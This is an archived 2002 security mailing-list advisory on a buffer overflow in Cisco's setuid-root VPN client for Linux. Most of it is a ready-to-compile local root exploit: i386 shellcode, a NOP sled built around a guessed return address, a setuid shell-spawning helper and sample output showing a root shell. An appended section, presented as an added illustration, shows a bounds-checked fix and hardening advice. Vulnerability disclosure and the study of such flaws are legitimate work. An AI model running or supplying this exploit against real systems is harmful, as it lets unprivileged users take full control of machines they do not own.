[EXPL] Cisco VPNclient Buffer Overflow

From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 21 Jun 2002 21:32:40 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Cisco VPNclient Buffer Overflow
------------------------------------------------------------------------

SUMMARY

Cisco's VPN client for Linux allows a user on a Linux host to connect to a
Cisco VPN device. The client binary is installed setuid root, and it copies
the profile name passed to its 'connect' argument into a fixed-size stack
buffer without checking the length. A profile name of 520 bytes or more
overwrites the saved return address, so any local user can run code as
root.

DETAILS

Exploit:
/* buffer overflow for cisco's vpnclient for Linux
   tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz

   to get this to properly work, you need to put the following code into
   xx.c, compile it (as xx), and place the executable into /tmp (to bypass
   tight PAM restrictions)

   #include <stdio.h>
   #include <unistd.h>
   int main(void) {
     setuid(0);
     execl("/bin/sh", "sh", (char *)NULL);
     return 0;
   }

   then compile this and run it. syntax is ./vpnclient <offset>
   tested under gentoo linux and debian:
   $ ls -la `which vpnclient`
   -rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient
   $ ./vpnKILLient
   addr: 0xbffffbac, offset: 0
   Cisco Systems VPN Client Version 3.5.1 (Rel)
   Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
   Client Type(s): Linux
   Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686

   sh-2.05a# id
   uid=0(root) gid=100(users) groups=100(users),10(wheel)

   greetz: all of the angrypacket crew (of course)
           shok -> pheerable^2;
           vegac -> 31336++;

   when you get a chance, check out http://sec.angrypacket.com
*/

#include <stdio.h>
#include <stdlib.h>     /* atoi(), malloc() */
#include <string.h>
#include <strings.h>    /* bzero() */
#include <unistd.h>     /* execl() */

#define NOP 0x90
#define LEN 620 /* 520 to own eip */

/* shellcode by vegac (setuid(0)->/tmp/xx) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        "\x31\xc0\x50\x68\x2f\x2f\x78\x78"
        "\x68\x2f\x74\x6d\x70\x89\xe3\x31"
        "\xc0\x50\x89\xe2\x54\x89\xe1\xb0"
        "\x0b\xcd\x80\x00";

/* read the current stack pointer; i386 only, so this must be built
   as a 32-bit binary like the client it targets */
unsigned long get_sp (void) {
  unsigned long sp;
  __asm__("mov %%esp,%0" : "=r"(sp));
  return sp;
}

int main(int argc, char *argv[]) {

  int i, offset=0;
  unsigned long addr;
  char *buf, *ptr;

  if(argc > 1) offset = atoi(argv[1]);

  buf = (char *)malloc(sizeof(char) * LEN);
  bzero(buf, LEN);
  addr = get_sp() - offset;
  printf("addr: 0x%lx, offset: %d\n", addr, offset);

  /* fill the whole buffer with the guessed return address */
  for(i = 0; i < LEN; i += 4) {
    *(long *)&buf[i] = addr;
  }

  /* first half becomes a NOP sled */
  for(i = 0; i < (LEN / 2); i++) {
    *(buf + i) = NOP;
  }

  /* shellcode sits in the middle of the sled */
  ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
  for(i = 0; i < strlen(shell); i++) {
    *(ptr++) = shell[i];
  }
  buf[LEN - 1] = '\0';

  /* the buffer is passed to the setuid client as the profile name */
  execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, (char *)NULL);
  return(0);

}
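As an added illustration (not part of the advisory and not Cisco's code), the following shows the "connect <profile>" argument handled with a bounded copy that refuses an oversized name instead of letting it overrun the stack. The buffer size PROFILE_MAX, the function names and the status codes are assumptions made for the example; the advisory does not give the real buffer size, only that a 520-byte name reaches the saved return address.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical size of the on-stack profile-name buffer (assumed; the
   advisory does not state the real size used by vpnclient). */
#define PROFILE_MAX 64

enum profile_status {
    PROFILE_OK = 0,
    PROFILE_MISSING,
    PROFILE_TOO_LONG
};

/* Bounded copy of a user-controlled argument into a fixed-size buffer.
   Anything that does not fit together with its NUL is rejected rather than
   truncated, so the caller gets a clear error instead of a silently
   shortened name, and nothing is ever written past dst[dstlen - 1].
   This is the replacement for the unchecked strcpy()-style copy behind
   the advisory; a bare strncpy() would also be wrong, since it can leave
   the buffer without a terminator. */
enum profile_status copy_profile_name(char *dst, size_t dstlen, const char *arg)
{
    size_t n = 0;

    if (dstlen == 0)
        return PROFILE_TOO_LONG;
    dst[0] = '\0';
    if (arg == NULL || arg[0] == '\0')
        return PROFILE_MISSING;

    /* Bounded scan: stop as soon as the name provably cannot fit, so a
       multi-kilobyte argument is refused without being read to its end. */
    while (n < dstlen && arg[n] != '\0')
        n++;
    if (n >= dstlen)
        return PROFILE_TOO_LONG;

    memcpy(dst, arg, n + 1);  /* n + 1 <= dstlen, includes the terminator */
    return PROFILE_OK;
}

/* Validate a name against a PROFILE_MAX-sized local buffer (hypothetical
   helper so the check can be exercised directly). */
enum profile_status check_name(const char *arg)
{
    char profile[PROFILE_MAX];
    return copy_profile_name(profile, sizeof profile, arg);
}

/* Minimal stand-in for the client's "connect <profile>" dispatch: the
   argument is validated before anything privileged would happen. */
enum profile_status handle_connect(int argc, char *argv[])
{
    char profile[PROFILE_MAX];
    enum profile_status st;

    if (argc < 3 || strcmp(argv[1], "connect") != 0)
        return PROFILE_MISSING;

    st = copy_profile_name(profile, sizeof profile, argv[2]);
    if (st == PROFILE_OK)
        printf("would connect using profile '%s'\n", profile);
    else
        fprintf(stderr, "profile name rejected (status %d)\n", (int)st);
    return st;
}

/* Builds the argv a shell would pass for "vpnclient connect <name>"
   (name == NULL means the profile argument was omitted). */
enum profile_status connect_with_name(const char *name)
{
    char *argv[4];
    int argc = 0;

    argv[argc++] = "vpnclient";
    argv[argc++] = "connect";
    if (name != NULL)
        argv[argc++] = (char *)name;
    argv[argc] = NULL;
    return handle_connect(argc, argv);
}

/* Constructed test input: a name of n 'A' characters in a static buffer. */
const char *make_name(size_t n)
{
    static char buf[1024];
    if (n >= sizeof buf)
        n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

int main(int argc, char *argv[])
{
    return handle_connect(argc, argv) == PROFILE_OK ? 0 : 1;
}
```

The check must run before any privileged action, and in a setuid-root program it is better still to parse the command line while running as the invoking user and hand only the validated profile name to the privileged part. Compiling with stack protection (gcc's -fstack-protector) turns a missed overflow of this kind into an abort rather than code execution, but it is a backstop, not a substitute for the bounds check.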

ADDITIONAL INFORMATION

The information has been provided by methodic (methodic@bigunz.angrypacket.com).
